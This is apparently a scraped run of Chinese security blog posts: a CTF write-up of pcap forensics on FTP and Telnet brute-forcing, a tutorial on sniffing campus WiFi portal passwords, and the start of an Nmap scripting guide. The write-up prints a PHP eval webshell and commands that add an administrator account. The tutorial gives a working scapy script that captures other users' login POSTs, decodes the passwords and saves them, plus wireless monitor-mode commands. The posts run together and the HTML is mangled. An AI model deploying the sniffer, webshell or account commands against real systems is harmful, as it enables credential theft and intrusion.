追查黑客ftp攻击过程&/p&&ul&&li&第8题：后来公司调整网络安全架构，成功防范了黑客的攻击，接着又对数据包3进行了分析，发现黑客在暴力破解ftp，并且成功获得了账号密码，黑客获取到的账号密码是什么（格式：账号/密码）&/li&&li&第9题：黑客获取到账号密码后，并成功登入了ftp，黑客是在什么时间登入ftp的？（格式：16:44:02）&/li&&li&第10题：黑客连接ftp的时候获取到了FTP的软件名称，服务器是用什么软件搭建FTP的&/li&&li&第11题：黑客成功登入ftp后，执行的第一条命令是什么？&/li&&li&第12题：黑客之后下载了一个相当关键的文件，该文件的名称是什么&/li&&/ul&&p&这里虽然是题目提示了黑客在爆破ftp，但在真实情况下也是需要分析的，爆破时会留下大量的一连串的ftp请求，这个比较简单就略过了。&/p&&h2&追查ftp爆破痕迹&/h2&&p&在数据包3中没有发现108的痕迹，黑客在这里又换回了136来爆破。&/p&&p&在红框处发现他已经爆出了正确的用户名，接下来就是密码了。&/p&&figure&&img src=&https://pic4.zhimg.com/v2-61f76ad32de6faafe99cd95b889ceb4f_b.png& data-rawwidth=&1155& data-rawheight=&598& class=&origin_image zh-lightbox-thumb& width=&1155& data-original=&https://pic4.zhimg.com/v2-61f76ad32de6faafe99cd95b889ceb4f_r.png&&&/figure&&p&在这里就看到黑客已经成功爆出了密码，并在登陆后执行了一些命令。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-04e8e0fa2ea79c797c275ec_b.png& data-rawwidth=&515& data-rawheight=&163& class=&origin_image zh-lightbox-thumb& width=&515& data-original=&https://pic1.zhimg.com/v2-04e8e0fa2ea79c797c275ec_r.png&&&/figure&&p&右键追踪TCP流，发现黑客以 woshiftp/woshimima 登入了ftp，并依次执行了SYST/PORT/LIST/TYPE/RETR/QUIT命令&/p&&figure&&img src=&https://pic4.zhimg.com/v2-6df5db0d949ca8a46fdb57caece6c9e7_b.png& data-rawwidth=&668& data-rawheight=&471& class=&origin_image zh-lightbox-thumb& width=&668& data-original=&https://pic4.zhimg.com/v2-6df5db0d949ca8a46fdb57caece6c9e7_r.png&&&/figure&&p&ftp的操作命令解释一下吧&/p&&ul&&li&SYST
确定服务器上运行的操作系统 &/li&&li&PORT 客户端选择端口 &/li&&li&TYPE
定义文件类型以及打印格式
A(ASCII) E(EBCDIC) I(Image)
N(Nonprint) T(TELNET) &/li&&li&LIST
列举指定目录下的子目录或文件&/li&&li&RETR 获取文件&/li&&li&QUIT 退出服务&/li&&/ul&&p&所以黑客在这里首先确定了服务器系统版本，并拷走了conn.php文件&/p&&p&conn.php文件应该是一个定义数据库连接的脚本，黑客拷走它的目的应当是想审计代码漏洞。&/p&&ul&&li&第8题：后来公司调整网络安全架构，成功防范了黑客的攻击，接着又对数据包3进行了分析，发现黑客在暴力破解ftp，并且成功获得了账号密码，黑客获取到的账号密码是什么（格式：账号/密码）&/li&&ul&&li&woshiftp/woshimima&/li&&/ul&&li&第9题：黑客获取到账号密码后，并成功登入了ftp，黑客是在什么时间登入ftp的？（格式：16:44:02）&/li&&ul&&li&22:02:23&/li&&/ul&&li&第10题：黑客连接ftp的时候获取到了FTP的软件名称，服务器是用什么软件搭建FTP的&/li&&ul&&li&Serv-U&/li&&/ul&&li&第11题：黑客成功登入ftp后，执行的第一条命令是什么？&/li&&ul&&li&SYST&/li&&/ul&&li&第12题：黑客之后下载了一个相当关键的文件，该文件的名称是什么&/li&&ul&&li&conn.php&/li&&/ul&&/ul&&p&所以在开启ftp/telnet这些服务的时候不能偷懒，一定得用强口令啊&/p&&p&====================================================================&/p&&h2&0x04 13-16题
telnet上传木马并提权&/h2&&ul&&li&第13题：后来黑客又尝试其他暴力破解其他端口，请问黑客有针对哪个端口进行了暴力破解&/li&&li&第14题：通过分析，发现黑客又在尝试暴力破解Telnet，并且成功破解，获取到的用户名与密码是什么？（格式：账号/密码）&/li&&li&第15题：成功登入后，黑客在WWW目下添加一个文件，文件名是什么？&/li&&li&第16题：通过具体分析，黑客还添加一个系统用户，该用户的账号密码是多少?（格式：账号/密码）&/li&&/ul&&p&telnet是一个远程登陆协议，类似ssh。不过telnet是明文传输，现在基本没人会开这个服务，都用ssh替代了。不过在一些维护昂贵的老旧的设备上（比如科研设备）可能还会开启。&/p&&h2&Telnet爆破&/h2&&p&爆破telnet这个没什么好讲的，和爆破ftp差不多。telnet默认端口是23，一看数据包就知道了。&/p&&p&telnet包的数据并不会在info栏下显示出来，因此我们只有通过数据长度判断。&/p&&p&这里首先发现了一条长达4062的数据流&/p&&figure&&img src=&https://pic1.zhimg.com/v2-20cff5baa310b9c7b858_b.png& data-rawwidth=&1425& data-rawheight=&216& class=&origin_image zh-lightbox-thumb& width=&1425& data-original=&https://pic1.zhimg.com/v2-20cff5baa310b9c7b858_r.png&&&/figure&&p&追踪TCP流发现黑客已经登陆进去，并准备对C:\WWW 下的文件进行操作&/p&&figure&&img src=&https://pic3.zhimg.com/v2-35ce2bdeffee03f6f7a306_b.png& data-rawwidth=&1045& data-rawheight=&853& class=&origin_image zh-lightbox-thumb& width=&1045& data-original=&https://pic3.zhimg.com/v2-35ce2bdeffee03f6f7a306_r.png&&&/figure&&p&在红框内看到login用户名是administrator，而password则显得有些奇怪，有许多奇怪的点，这里是编码转换失败出现的问题。所以这里查看Hex16进制码&/p&&figure&&img src=&https://pic4.zhimg.com/v2-be1cc56c95d7549fff9cf27_b.png& data-rawwidth=&844& data-rawheight=&208& class=&origin_image zh-lightbox-thumb& width=&844& data-original=&https://pic4.zhimg.com/v2-be1cc56c95d7549fff9cf27_r.png&&&/figure&&p&按照hex对ascll码，翻译出&/p&&ul&&li&0d=CR=回车&/li&&li&18=CAN=取消&/li&&li&00=NULL=截断&/li&&/ul&&p&ff和fa还有f0这里没有对应的ascll码，我就不是很懂了，不过我判断黑客在输入xxb后回车应该就是登陆了，然后后面的应该就是自处理程序（？）&/p&&h2&木马上传&/h2&&p&之前看到黑客dir列出了C:\WWW目录下的文件，所以判断他要对此文件夹进行操作。继续向下查看，就看到他用vi写入了一个php木马文件&/p&&figure&&img src=&https://pic2.zhimg.com/v2-2a6ead0d_b.png& data-rawwidth=&892& data-rawheight=&546& class=&origin_image zh-lightbox-thumb& width=&892& data-original=&https://pic2.zhimg.com/v2-2a6ead0d_r.png&&&/figure&&p&写入的内容是一个一句话木马，保存为了muma.php&/p&&div class=&highlight&&&pre&&code class=&language-php&&&span class=&cp&&&?php&/span& &span class=&o&&@&/span&&span class=&k&&eval&/span&&span class=&p&&(&/span&&span class=&nv&&$_POST&/span&&span class=&p&&[&/span&&span class=&nx&&xsmuma&/span&&span class=&p&&])&/span& &span class=&cp&&?&&/span&&span class=&x&&&/span&
&/code&&/pre&&/div&&h2&提权&/h2&&p&在上传了一句话木马后，就可以用菜刀连接了，并且可以在菜刀的虚拟终端进行提权操作。&/p&&p&（通常连接菜刀提权没有这么直接，这里的题目只是简单示范。详细：&a href=&https://zhuanlan.zhihu.com/p/& class=&internal&&木马文件上传防御策略及几种绕过检测方式 - 知乎专栏/&/a&&a href=&https://zhuanlan.zhihu.com/p/& class=&internal&&Windows服务器提权和开启3389远程连接 - 知乎专栏&/a&）&/p&&p&添加用户命令&/p&&div class=&highlight&&&pre&&code class=&language-text&&net user [username] [password] /add
&/code&&/pre&&/div&&p&提升为系统权限&/p&&div class=&highlight&&&pre&&code class=&language-text&&net localgroup Administrators [username] /add
&/code&&/pre&&/div&&p&继续查看数据流发现黑客执行了&/p&&div class=&highlight&&&pre&&code class=&language-text&&net user
&/code&&/pre&&/div&&figure&&img src=&https://pic4.zhimg.com/v2-ebb59aad11cf0c22fd32d0b_b.png& data-rawwidth=&1154& data-rawheight=&454& class=&origin_image zh-lightbox-thumb& width=&1154& data-original=&https://pic4.zhimg.com/v2-ebb59aad11cf0c22fd32d0b_r.png&&&/figure&&p&所以这里添加的用户名是55555，密码是44444&/p&&p&telnet这东西直接关掉就好了。ssh、ftp、3389这些如果一定要用，最好的防范措施就是强口令，再把大量错误访问数据的可疑ip短时间封掉。l&/p&&ul&&li&第13题：后来黑客又尝试其他暴力破解其他端口，请问黑客有针对哪个端口进行了暴力破解&/li&&ul&&li&23&/li&&/ul&&li&第14题：通过分析，发现黑客又在尝试暴力破解Telnet，并且成功破解，获取到的用户名与密码是什么？（格式：账号/密码）&/li&&ul&&li&administrator/xxb&/li&&/ul&&li&第15题：成功登入后，黑客在WWW目下添加一个文件，文件名是什么？&/li&&ul&&li&muma.php&/li&&/ul&&li&第16题：通过具体分析，黑客还添加一个系统用户，该用户的账号密码是多少?（格式：账号/密码）&/li&&ul&&li&&/li&&/ul&&/ul&&p&=====================================================================&/p&&p&泽日再续&/p&
[NEW]Apr 26
13-16题 telnet爆破和木马上传提权已补充[NEW]Apr 25
8-12题 ftp爆破已补充
[INFO]Apr 24
数据包已上传，链接： 密码：6hjs
[NEW]Apr 24
5-7题黑客攻击时间和方式…
&figure&&img src=&https://pic3.zhimg.com/v2-99a1eb9be60a3b7ba6ad541a0e21c840_b.jpg& data-rawwidth=&960& data-rawheight=&557& class=&origin_image zh-lightbox-thumb& width=&960& data-original=&https://pic3.zhimg.com/v2-99a1eb9be60a3b7ba6ad541a0e21c840_r.jpg&&&/figure&&p&&i&&b&*********&/b&&/i&&i&&b&*******&/b&&/i&&i&&b&&i&&b&*****&/b&&/i&**本文提及的方法仅供安全学习用途，禁止非法利用**************************&/b&&/i&&/p&&h2&0x00 写在前面&/h2&&p&某高校校区的校园网WIFI的采用H3C的Web认证，在网页里输入学号和密码，post出去，你的这个mac地址就可以上网了。此方式不是wpa/wpa2，也不是802.1x，而只是单纯的web认证，是大有文章可做的。因此我想是否能在开放无线网环境中抓取到登陆时认证发送的数据包，从中取出用户名和密码。&/p&&p&参考Freebuf的&a href=&https://link.zhihu.com/?target=http%3A//www.freebuf.com/articles/network/129721.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&如何在开放无线网络中嗅探校园网密码&/a&这篇文章提供的python脚本，针对该校的网络进行了一些修改，使用该脚本嗅探校园网WIFI账号密码。&/p&&h2&0x01 初步分析认证交互&/h2&&p& 该校校园网WIFI采用H3C认证，认证地址为内网某服务器上。url为&a href=&https://link.zhihu.com/?target=http%3A//192.168.150.2%3A8080/portal/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&http://192.168.xxx.x:xxxx/portal/index_default.jsp&/a&&/p&&p&&b&查看DOM&/b&&/p&&p& 发现了几个重要的函数。base64()、checkUserName()、encrypt()&/p&&p&base64是将输入的文本进行一次base64编码，checkUerName就是检查用户名，encrypt是将密码再进行一次加密。&/p&&figure&&img src=&https://pic3.zhimg.com/v2-eecdd98ee624e443ab1a8_b.jpg& data-rawwidth=&1305& data-rawheight=&798& class=&origin_image zh-lightbox-thumb& width=&1305& data-original=&https://pic3.zhimg.com/v2-eecdd98ee624e443ab1a8_r.jpg&&&/figure&&p&&b&分析网络流&/b&&br&&/p&&p&首先使用火狐的firebug+检查元素来分析网络流。&/p&&p&当我们访问登陆页面时，发送GET请求并带一个i_p_pl的cookie&/p&&p&&figure&&img src=&https://pic4.zhimg.com/v2-bf33b3caaf_b.jpg& data-rawwidth=&927& data-rawheight=&518& class=&origin_image zh-lightbox-thumb& width=&927& data-original=&https://pic4.zhimg.com/v2-bf33b3caaf_r.jpg&&&/figure& 尝试登陆，登陆成功跳转到&a href=&https://link.zhihu.com/?target=http%3A//192.168.xxx.x%3Axxxx/portal/succese.jsp& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&http://192.168.xxx.x:xxxx/portal/page/loginSucc.jsp&/a&，发送了*个GET请求，除去图片和脚本，此次登陆只向/portal/loginSucc.jsp发送了GET包，除了i_p_pl，还带有hello1、hello2两个个cookie，其中hello1为登陆发送的username，hello2暂不明其含义。 &/p&&p&在后来的测试中，发现hello2是【记住登陆】功能的参数，当hello2=false时不记住，hello2=true时记住并附带hello3、hello4、hello5参数，本来应当是可以利用这些cookie来绕过登陆直接请求认证的，不过考虑到其又要增加工作量，因此先放一边。&/p&&br&&figure&&img src=&https://pic4.zhimg.com/v2-279ce765f1d97c43b8a7bf_b.jpg& data-rawwidth=&373& data-rawheight=&68& class=&content_image& width=&373&&&/figure&这就很奇怪了，在整个登陆过程全部都是GET请求而没有POST请求，没有POST请求是怎么把用户名密码传输上去认证的呢？况且之前已经在DOM中发现了base64encode()和query()函数。难道用户名和密码是在GET时Cookie中传上去的？。虽然不用想就知道GET发送cookie来登陆很扯，但还是要研究一下cookie的含义。&p&&figure&&img src=&https://pic1.zhimg.com/v2-bcc5e9f15b77dec561a603ca8f063bc2_b.jpg& data-rawwidth=&308& data-rawheight=&224& class=&content_image& width=&308&&&/figure&&br&&b&探究cookie含义&/b&&/p&&p&登陆时发送的i_p_pl &br&&/p&&p&i_p_pl=JTdCJTIyZXJyb3JOdW1iZXIlMjIlM0ElMjIxJTIyJTJDJTIybmV4dFVybCUyMiUzQSUyMmh0dHAlM0ElMkYlMkYxOTIuMTY4LjE1MC4yJTNBODA4MCUyRnBvcnRhbCUyRmluZGV4X2RlZmF1bHQuanNwJTIyJTJDJTIycXVpY2tBdXRoJTIyJTNBZmFsc2UlMkMlMjJjbGllbnRMYW5ndWFnZSUyMiUzQSUyMkNoaW5lc2UlMjIlMkMlMjJhc3NpZ25JcFR5cGUlMjIlM0EwJTJDJTIyaU5vZGVQd2ROZWVkRW5jcnlwdCUyMiUzQTElMkMlMjJ3bGFubmFzaWQlMjIlM0ElMjIlMjIlMkMlMjJ3bGFuc3NpZCUyMiUzQSUyMiUyMiUyQyUyMm5hc0lwJTIyJTNBJTIyJTIyJTJDJTIyYnlvZFNlcnZlcklwJTIyJTNBJTIyMC4wLjAuMCUyMiUyQyUyMmJ5b2RTZXJ2ZXJJcHY2JTIyJTNBJTIyMDAwMCUzQTAwMDAlM0EwMDAwJTNBMDAwMCUzQTAwMDAlM0EwMDAwJTNBMDAwMCUzQTAwMDAlMjIlMkMlMjJieW9kU2VydmVySHR0cFBvcnQlMjIlM0ElMjI4MDgwJTIyJTJDJTIyaWZUcnlVc2VQb3B1cFdpbmRvdyUyMiUzQWZhbHNlJTJDJTIydWFtSW5pdEN1c3RvbSUyMiUzQSUyMjElMjIlMkMlMjJjdXN0b21DZmclMjIlM0ElMjJNUSUyMiUyQyUyMnJlZ0NvZGVUeXBlJTIyJTNBJTIyTUElMjIlN0Q&/p&&p&很明显这是一个base64编码过的字符串，把这个base64解码再url解码，就得到了&/p&&p&{&errorNumber&:&1&,&nextUrl&:&&a href=&https://link.zhihu.com/?target=http%3A//192.168.150.2%3A8080/portal/index_default.jsp& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&http://192.168.xxx.x:xxxx/portal/index_default.jsp&/a&&,&quickAuth&:false,&clientLanguage&:&Chinese&,&assignIpType&:0,&iNodePwdNeedEncrypt&:1,&wlannasid&:&&,&wlanssid&:&&,&nasIp&:&&,&byodServerIp&:&0.0.0.0&,&byodServerIpv6&:&00:00:&,&byodServerHttpPort&:&8080&,&ifTryUsePopupWindow&:false,&uamInitCustom&:&1&,&customCfg&:&MQ&,&regCodeType&:&MA&} &/p&&p&这只是向无线路由器发送的表明自己身份的未完成的表单，没有我们要的用户名和密码。&/p&&h2&0x02 Wireshark抓取完整认证过程&/h2&&p&只有GET请求果然很扯，这很有可能是我们的浏览器网络流分析工具有些问题，或者该Web认证的安全性足够好，导致我们无法截取完整的请求流。&/p&&p&这样就只有用Wireshark来对网卡进行完全的监听，以抓取全部流量包。&/p&&p&设置Capture interface为 WLAN 无线网卡，开启抓取后重现登陆过程。&/p&&p&抓到的流量包除了访问该认证网站的http流，还包括了所有经过该无线网卡的所有协议的网络流。&/p&&p&&figure&&img src=&https://pic2.zhimg.com/v2-6cda6d610aefc4c269c322f_b.jpg& data-rawwidth=&1912& data-rawheight=&799& class=&origin_image zh-lightbox-thumb& width=&1912& data-original=&https://pic2.zhimg.com/v2-6cda6d610aefc4c269c322f_r.jpg&&&/figure&设置过滤规则为http协议并且只有该认证网址ip。&/p&&p&发现登录一次h3c系统，要先后传参给3个页面，一个/pws？t=li，一个/afterlogin.jsp,一个/loginSucc.jsp，所以就分别看这几个网页的抓包数据。&/p&&p&发现其cookie都是一样的，但是只有pws这个页面是POST请求。&/p&&p&&figure&&img src=&https://pic1.zhimg.com/v2-1d86af749bc5c0d02e757e52e08d791f_b.jpg& data-rawwidth=&1301& data-rawheight=&807& class=&origin_image zh-lightbox-thumb& width=&1301& data-original=&https://pic1.zhimg.com/v2-1d86af749bc5c0d02e757e52e08d791f_r.jpg&&&/figure& 查看pws应用层传输的数据，发现上传了【userName】和【userPwd】参数，也就是说，只有这个页面是验证密码的。&/p&&p&【userName】就是登陆的用户名，【userPwd】是经过base64编码后的密码。&/p&&h2&&figure&&img src=&https://pic3.zhimg.com/v2-4d028c51c867078cbc1530_b.jpg& data-rawwidth=&1538& data-rawheight=&839& class=&origin_image zh-lightbox-thumb& width=&1538& data-original=&https://pic3.zhimg.com/v2-4d028c51c867078cbc1530_r.jpg&&&/figure& 0x03 总结思路&/h2&&p&我们可以抓取用户登陆时的POST请求来获取用户名和密码，也可以在用户勾选【记住密码】时获取带有用户名密码信息的cookie。&/p&&ol&&li&当抓到client ==& server的数据包时&/li&&/ol&&ul&&li&
如果是GET请求，检查有没有Cookie存在。&/li&&li&如果是POST请求，把用户名和密码拿出来。&/li&&/ul&2. 当抓到的是server ==& client的数据包时&ul&&li&
检查是否有set-cookie头部，有的话取出来。&/li&&/ul&&p&最后如果有cookie被嗅探到，就带着cookie把向server索要一下密码。&/p&&p&&b&但是为了偷懒，这里就不嗅探cookie了，直接嗅探POST的用户名和密码就行了。最终思路如下：&/b&&/p&&p&当抓到client ==& server的数据包时，如果是POST请求，直接把用户名和密码拿出来。&/p&&h2&0x04 嗅探&/h2&&p&&b&实验环境&/b&&/p&&ul&&li& Ubuntu虚拟机&/li&&li& 大功率USB无线网卡（8187等）&/li&&li&python2.7&/li&&/ul&&p&&b& python扩展库需要&/b&&/p&&ul&&li& requests&/li&&li& scapy&/li&&li& scapy_http&/li&&li&lxml&/li&&/ul&&p&&b& 代码&/b&&/p&&h2&&div class=&highlight&&&pre&&code class=&language-python&&&span&&/span&&span class=&kn&&import&/span& &span class=&nn&&requests&/span&
&span class=&kn&&import&/span& &span class=&nn&&scapy_http.http&/span& &span class=&kn&&as&/span& &span class=&nn&&http&/span&
&span class=&kn&&from&/span& &span class=&nn&&scapy.all&/span& &span class=&kn&&import&/span& &span class=&o&&*&/span&
&span class=&kn&&from&/span& &span class=&nn&&lxml&/span& &span class=&kn&&import&/span& &span class=&n&&etree&/span&
&span class=&n&&iface&/span& &span class=&o&&=&/span& &span class=&s1&&'wlan0'&/span&
&span class=&n&&url&/span& &span class=&o&&=&/span& &span class=&s2&&&http://192.168.xxx.x:xxxx/portal/pws?t=li&&/span&
&span class=&n&&path&/span& &span class=&o&&=&/span& &span class=&s2&&&/root&&/span&
&span class=&k&&def&/span& &span class=&nf&&prn&/span&&span class=&p&&(&/span&&span class=&n&&pkt&/span&&span class=&p&&):&/span&
&span class=&n&&data&/span& &span class=&o&&=&/span& &span class=&bp&&None&/span&
&span class=&c1&&#std ==& ap&/span&
&span class=&k&&if&/span& &span class=&n&&pkt&/span&&span class=&o&&.&/span&&span class=&n&&haslayer&/span&&span class=&p&&(&/span&&span class=&n&&http&/span&&span class=&o&&.&/span&&span class=&n&&HTTPRequest&/span&&span class=&p&&):&/span&
&span class=&c1&&#if post the username and password&/span&
&span class=&k&&if&/span& &span class=&n&&pkt&/span&&span class=&o&&.&/span&&span class=&n&&Method&/span& &span class=&o&&==&/span& &span class=&s1&&'POST'&/span& &span class=&ow&&and&/span& &span class=&s1&&'userName'&/span& &span class=&ow&&in&/span& &span class=&n&&pkt&/span&&span class=&o&&.&/span&&span class=&n&&load&/span&&span class=&p&&:&/span&
&span class=&n&&dt&/span& &span class=&o&&=&/span& &span class=&p&&{&/span&&span class=&n&&i&/span&&span class=&o&&.&/span&&span class=&n&&split&/span&&span class=&p&&(&/span&&span class=&s2&&&=&&/span&&span class=&p&&)[&/span&&span class=&mi&&0&/span&&span class=&p&&]:&/span&&span class=&n&&i&/span&&span class=&o&&.&/span&&span class=&n&&split&/span&&span class=&p&&(&/span&&span class=&s2&&&=&&/span&&span class=&p&&)[&/span&&span class=&mi&&1&/span&&span class=&p&&]&/span& &span class=&k&&for&/span& &span class=&n&&i&/span& &span class=&ow&&in&/span& &span class=&n&&pkt&/span&&span class=&o&&.&/span&&span class=&n&&load&/span&&span class=&o&&.&/span&&span class=&n&&split&/span&&span class=&p&&(&/span&&span class=&s2&&&&&&/span&&span class=&p&&)}&/span&
&span class=&n&&data&/span& &span class=&o&&=&/span& &span class=&s2&&&:::&&/span&&span class=&o&&.&/span&&span class=&n&&join&/span&&span class=&p&&((&/span&&span class=&n&&dt&/span&&span class=&p&&[&/span&&span class=&s2&&&userName&&/span&&span class=&p&&],&/span&&span class=&n&&dt&/span&&span class=&p&&[&/span&&span class=&s2&&&userPwd&&/span&&span class=&p&&][&/span&&span class=&mi&&3&/span&&span class=&p&&:]&/span&&span class=&o&&.&/span&&span class=&n&&decode&/span&&span class=&p&&(&/span&&span class=&s2&&&base64&&/span&&span class=&p&&)))&/span& &span class=&o&&+&/span& &span class=&s1&&'&/span&&span class=&se&&\n&/span&&span class=&s1&&'&/span&
&span class=&k&&print&/span& &span class=&s1&&'[+]Get! Post data:&/span&&span class=&si&&%s&/span&&span class=&s1&& &/span&&span class=&si&&%s&/span&&span class=&s1&& &/span&&span class=&si&&%s&/span&&span class=&s1&& &/span&&span class=&si&&%s&/span&&span class=&s1&&'&/span&&span class=&o&&%&/span&&span class=&p&&(&/span&&span class=&n&&dt&/span&&span class=&p&&[&/span&&span class=&s1&&'userName'&/span&&span class=&p&&],&/span&&span class=&n&&dt&/span&&span class=&p&&[&/span&&span class=&s1&&'userPwd'&/span&&span class=&p&&])&/span&
&span class=&k&&if&/span& &span class=&n&&data&/span& &span class=&o&&!=&/span& &span class=&bp&&None&/span&&span class=&p&&:&/span&
&span class=&k&&with&/span& &span class=&nb&&open&/span&&span class=&p&&(&/span&&span class=&n&&path&/span& &span class=&o&&+&/span& &span class=&s2&&&schoolUserPwd.txt&&/span&&span class=&p&&,&/span& &span class=&s2&&&a&&/span&&span class=&p&&)&/span& &span class=&k&&as&/span& &span class=&n&&txt&/span&&span class=&p&&:&/span&
&span class=&n&&txt&/span&&span class=&o&&.&/span&&span class=&n&&write&/span&&span class=&p&&(&/span&&span class=&n&&data&/span&&span class=&p&&)&/span&
&span class=&k&&def&/span& &span class=&nf&&main&/span&&span class=&p&&():&/span&
&span class=&k&&try&/span&&span class=&p&&:&/span&
&span class=&n&&sniff&/span&&span class=&p&&(&/span&&span class=&n&&iface&/span&&span class=&o&&=&/span&&span class=&n&&iface&/span&&span class=&p&&,&/span& &span class=&n&&prn&/span&&span class=&o&&=&/span&&span class=&n&&prn&/span&&span class=&p&&,&/span& &span class=&nb&&filter&/span&&span class=&o&&=&/span&&span class=&s2&&&ip host 192.168.xxx.x&&/span&&span class=&p&&,&/span& &span class=&n&&store&/span&&span class=&o&&=&/span&&span class=&mi&&0&/span&&span class=&p&&)&/span&
&span class=&c1&&#sniff(offline=path + &school.pcap&, prn=prn, filter=&ip host 192.168.xxx.x&)&/span&
&span class=&k&&except&/span& &span class=&ne&&KeyboardInterrupt&/span&&span class=&p&&,&/span& &span class=&n&&e&/span&&span class=&p&&:&/span&
&span class=&k&&print&/span& &span class=&s2&&&quitting...&&/span&
&span class=&k&&if&/span& &span class=&n&&__name__&/span& &span class=&o&&==&/span& &span class=&s1&&'__main__'&/span&&span class=&p&&:&/span&
&span class=&n&&main&/span&&span class=&p&&()&/span&
&/code&&/pre&&/div&&/h2&&p&&b&说明&/b&&/p&&ul&&li&requests用来向服务器请求&/li&&li&scapy用来在无线网络中嗅探&/li&&br&&li&scapy_http用来对http协议更方便的解析&/li&&li&lxml用来从服务器返回的html文件中，解析出来用户名和密码&/li&&li&prn是sniff函数每过滤到一个符合条件的数据包时回调的函数，并将数据包本身作为参数传入&/li&&li& 之所以选择Ubuntu而不是Windows是因为scapy_http在win下运行有些问题&/li&&/ul&&p&&b& 注意&/b&&/p&&p&由于我们既要嗅探，同时又要向服务器请求，所以airmon-ng check kill后，无线网卡开启monitor模式，再将网卡调到信号最强的ap的信道上。之前经过kismet抓取无线网包发现该校园网WIFI是在channel 1/6/11信道上工作的。&/p&&p&最后再打开网络管理的服务。&/p&&p&执行以下命令&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&$sudo airmon-ng check kill
$sudo ifconfig wlan0 down
$sudo iwconfig wlan0 mode monitor
$sudo ifconfig wlan0 up
$sudo iwconfig mon0 channel 1/6/11
$sudo service network-manager start
&/code&&/pre&&/div&&p&&b& 结果&/b&&/p&&p&由于之前买的无线网卡是劣质品无法识别，因此暂无结果。&/p&&p&理论上是可以嗅探到的，等成功嗅探后再补发。&/p&&p&就算没有嗅探到，这个思路也是可以学习一下的。。。&br&&/p&&p&&i&&b&*********&/b&&/i&&i&&b&*******&/b&&/i&&i&&b&&i&&b&**&/b&&/i&再次强调，本文提及的方法仅供安全学习用途，禁止非法利用******************&/b&&/i&&/p&&p&&i&&b&&i&&b& 参考：&/b&&/i&&br&&/b&&/i&&/p&&blockquote&&p&&a href=&https://link.zhihu.com/?target=http%3A//www.freebuf.com/articles/network/129721.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&[1]如何在开放无线网络中嗅探校园网密码&/a&&/p&&p&&a href=&https://link.zhihu.com/?target=http%3A//www.freebuf.com/sectool/127989.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&[2]scapy在wlan中的应用&/a&&/p&&/blockquote&
***********************本文提及的方法仅供安全学习用途，禁止非法利用**************************0x00 写在前面某高校校区的校园网WIFI的采用H3C的Web认证，在网页里输入学号和密码，post出去，你的这个mac地址就可以上网了。此方式不是wpa/wpa2，也不是8…
&figure&&img src=&https://pic2.zhimg.com/v2-210a68f901b4dac040ce6e42651ded20_b.jpg& data-rawwidth=&792& data-rawheight=&320& class=&origin_image zh-lightbox-thumb& width=&792& data-original=&https://pic2.zhimg.com/v2-210a68f901b4dac040ce6e42651ded20_r.jpg&&&/figure&&h2&0x00 介绍&/h2&&p&&b&本文由 一叶知安作者：倾旋 原创。未经许可，严禁转载！&/b&&br&&/p&&p&&b&nmap&/b&是一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统。它是网络管理员必用的软件之一，以及用以评估网络系统安全。&/p&&p&—— 来自百度百科&/p&&p&那么今天带大家来揭露Nmap的另一个面纱 ，那就是脚本。 &br&&/p&&p&在某些时候，我们大部分都使用Nmap进行扫描，然后再通过Metasploit进行漏洞利用，但是这个过程比较繁琐，一个个漏洞去验证的话还需要打开MSF去设置参数，最后run/exploit（不包括自动化，所以不要喷了）。&/p&&p& 那么我们就要有必要认识一下Nmap的扩展脚本啦～&/p&&h2&0x01 脚本参数 &/h2&&p&这个小例子中我会演示几个基本的脚本使用方式，但是更多的还是需要大家掌握使用脚本的技巧，然后自行发掘了。笔者在此不概述太多。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&SCRIPT SCAN:
-sC: equivalent to --script=default
--script=&Lua scripts&: &Lua scripts& is a comma separated list of
directories, script-files or script-categories
--script-args=&n1=v1,[n2=v2,...]&: provide arguments to scripts
--script-args-file=filename: provide NSE script args in a file
--script-trace: Show all data sent and received
--script-updatedb: Update the script database.
--script-help=&Lua scripts&: Show help about scripts.
&Lua scripts& is a comma-separated list of script-files or
script-categories.
&/code&&/pre&&/div&&p&上面这部分是Nmap关于脚本的参数，下面一个一个来介绍：&/p&&p&&b&-sC&/b& 是指的是采用默认配置扫描，与&b&--script=default&/b&参数等价&/p&&p&&b&--script=脚本名称&/b&，脚本一般都在&b&Nmap的安装目录下的scripts目录中&/b&&/p&&p&那么Linux下可以查看脚本数量：&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&ls /usr/share/nmap/scripts/ | wc -l
&/code&&/pre&&/div&&p&那么我当前的Nmap是有&b&516&/b&个很使用的漏洞利用、工具脚本。也可以使用下面一条命令导出 ～&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&ls /usr/share/nmap/scripts/ | sed 's/.nse//' & scripts.list
&/code&&/pre&&/div&&p&那么所有的脚本名称都在&b&scripts.list&/b&中了，这样做的原因是因为我们传递脚本名称的时候，不能写脚本的文件扩展名(.nse)。&/p&&p&&b&--script-args=key1=value1,key2=value2...
&/b&该参数是用来传递脚本里面的参数的，key1是参数名，该参数对应value1这个值，那么有更多的参数，使用逗号连接，后面例子中会给大家讲解。&/p&&p&&b&–script-args-file=filename&/b&，使用文件来为脚本提供参数。 &br&&/p&&p&&b&--script-trace &/b&如果设置该参数，则所有的脚本收发请求过程。&/p&&p&&b&--script-updatedb &/b&在Nmap的scripts目录里有一个script.db，该文件中保存了当前Nmap可用的脚本，类似于一个小型数据库，如果我们开启nmap并且调用了此参数，则nmap会自行扫描scripts目录中的扩展脚本，进行数据库更新。&/p&&p&&b&--script-help=脚本名称&/b&，调用该参数后，Nmap会输出该脚本名称对应的脚本使用参数，以及详细介绍信息。&/p&&h2&&b&0x02 实战&/b&&br&&/h2&&p&现在我们用一个很简单的脚本，telnet爆破脚本，我们搜索一下：&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&root@ThundeRobot:/usr/share/nmap# ls /usr/share/nmap/scripts/ | grep telnet
telnet-brute.nse
telnet-encryption.nse
